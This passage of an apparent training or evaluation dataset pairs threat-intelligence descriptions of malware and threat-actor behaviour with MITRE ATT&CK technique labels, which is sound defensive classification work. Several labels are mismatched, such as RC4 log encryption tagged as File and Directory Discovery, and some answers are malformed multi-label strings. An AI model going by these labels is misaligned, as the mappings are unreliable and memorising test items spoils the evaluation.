- "role": "user",
- "content": "Figure 3: no detections for SpeakUp in Virus Total In an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted base64"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has created a local user account with administrator privileges."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. This campaign relies on the abuse of Blogspot to host attacker-operated blogs serving malicious VB based scripts to their targets. We've found preliminary malicious components from initial access beacons to file exfiltrators being deployed to victims. In many cases, the content of these preliminary components was combined to serve special scripts to victims.The final implants utilized by the actors in this campaign are derivatives of the Gold Dragon/Brave Prince malware families. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations"
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can find shared drives on the local system."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OLDBAIT installs itself in \"%ALLUSERPROFILE%\\\\Application Data\\Microsoft\\MediaPlayer\\updatewindws.exe\"; the directory name is missing a space and the file name is missing the letter \"o.\""
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyZBot contains screen capture functionality."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use Dropbox for data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion > \"C:\\windows\\TEMP\\[RANDOM].tmp\"."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection', 'T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can recover hashed passwords."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can execute malicious VBA macros embedded in .xlsm files."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compressed data with zlib prior to sending it over C2."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig can leverage API functions such as \"ShellExecuteA\" and \"HttpOpenRequestA\" in the process of downloading and executing files."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system."
- },
- {
- "role": "assistant",
- "content": "T1564.009 - Resource Forking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "infected victims using JavaScript code."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial beacon packet for contains the operating system version of the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\""
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used a tool to enumerate proxy settings in the target environment."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments."
- },
- {
- "role": "assistant",
- "content": "T1497.002 - User Activity Based Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor has come with a packed payload."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has performed C2 using DNS via A, OPT, and TXT records."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell has a command to modify a Registry key."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy has a built-in module for port scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's dispatcher can establish persistence by registering a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used wmic.exe to set environment variables."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT collects information about the network including the IP address and DHCP server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has used the open source UPX executable packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has used HTTP POST requests to transmit data."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has performed anti-analysis checks to determine if its malware was in a debugging environment."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has accessed victims’ internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A})."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization/Sandbox Evasion."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "discovers shares on the network"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can bypass UAC by registering as the default handler for .MSC files."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can query service status using \"QueryServiceStatusEx\" function."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Enumerates running processes for “Wireshark” and “Sysinternals”"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor has the ability to modify the Registry on compromised hosts using \"RegDeleteValueA\" and \"RegCreateKeyExA\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has checked the language of the machine with function \"GetUserDefaultUILanguage\" and terminated execution if the language matches with an entry in the predefined list."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the victim’s IP address via the ipconfig -all command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This appears to be an implementation of hashbusting — a method of obfuscation in which a malware sample is subtly changed on the fly so each sample has a different checksum. As a result, the SHA256 hash of each payload downloaded from the sites in question appeared to be unique. However, the SSDEEP fuzzy hash of this sample was as follows"
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy communicates with its C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa can perform network reconnaissance using the Advanced Port Scanner tool."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remote templates are a feature of Microsoft Word which allow a document to load a template to be used in a document – this template can be externally hosted, either on a file share, or on the internet. The template is then loaded when the document is opened. The Inception attackers use this feature in a malicious context as shown in Figure 1 below"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has encrypted the payload used for C2."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has used a VPN to persist in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor has the ability to discover the hostname of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session."
- },
- {
- "role": "assistant",
- "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads additional files that are base64-encoded and encrypted with another cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware will ultimately be extracted to the %LocalAppData%\\Packages\\PXT folder, which includes the PHP.exe local interpreter, various scripts used to steal information, and supporting tools, as shown below."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK provides access to the Windows Registry, which can be used to gather information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Honeybee, at least one identified persona was used to register for a free account for a control server."
- },
- {
- "role": "assistant",
- "content": "T1583.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has downloaded and executed additional encoded payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can attempt to stop security software."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims’ servers"
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy a container', 'T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear has the ability to decrypt its RC4 encrypted payload for execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT gathers the current domain the victim system belongs to."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "persists via a login item."
- },
- {
- "role": "assistant",
- "content": "T1547.015 - Boot or Logon Autostart Execution: Login Items"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MimiPenguin can dump process memory and extract clear-text credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.007 - OS Credential Dumping: Proc Filesystem"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can identify whether it has been run previously on a host by checking for a specified folder."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
